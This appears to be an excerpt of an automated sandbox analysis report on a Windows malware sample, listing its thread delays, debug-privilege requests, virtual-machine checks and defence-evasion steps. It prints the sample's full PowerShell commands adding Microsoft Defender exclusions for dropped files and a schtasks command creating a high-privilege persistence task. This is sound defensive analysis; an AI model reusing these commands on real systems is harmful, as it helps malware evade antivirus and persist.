Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\ctfmon.exe | File Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 599859Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 599734Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 599625Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 599502Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 599375Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 599266Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 599141Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 599031Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 598915Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 100000Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 99891Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 99781Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 99672Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 99563Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 99438Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 99313Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 99175Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 99047Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 98937Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 98821Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 98689Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 98563Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 98437Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 98328Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 98219Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 98110Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 97985Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 596734Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 596604Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 596499Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 596370Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 596203Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 596009Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 595828Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Recovery\ctfmon.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Recovery\ctfmon.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\ctfmon.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: LzmJLVB41K.exe, 00000000.00000002.2390828260.000000001B99B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\2
                            Source: LzmJLVB41K.exe, 00000000.00000002.2393555582.000000001C0AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll55
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess token adjusted: Debug
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess token adjusted: Debug
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe'
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ctfmon.exe'
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe'
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe'
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe'
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\LzmJLVB41K.exe'
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline"
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a4ouxeif\a4ouxeif.cmdline"
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fozAQGvSmfTQIywuzSgkf" /sc MINUTE /mo 8 /tr "'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Kg1DnkFEGg.bat"
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6584.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC80740084700441B098BDC166533478DB.TMP"
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6A18.tmp" "c:\Windows\System32\CSC7E7B7A5EED54F4581A1AD8A9D40FA45.TMP"
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Queries volume information: C:\Users\user\Desktop\LzmJLVB41K.exe VolumeInformation
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe | Queries volume information: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe VolumeInformation
                            Source: C:\Recovery\ctfmon.exe | Queries volume information: C:\Recovery\ctfmon.exe VolumeInformation
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe | Queries volume information: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
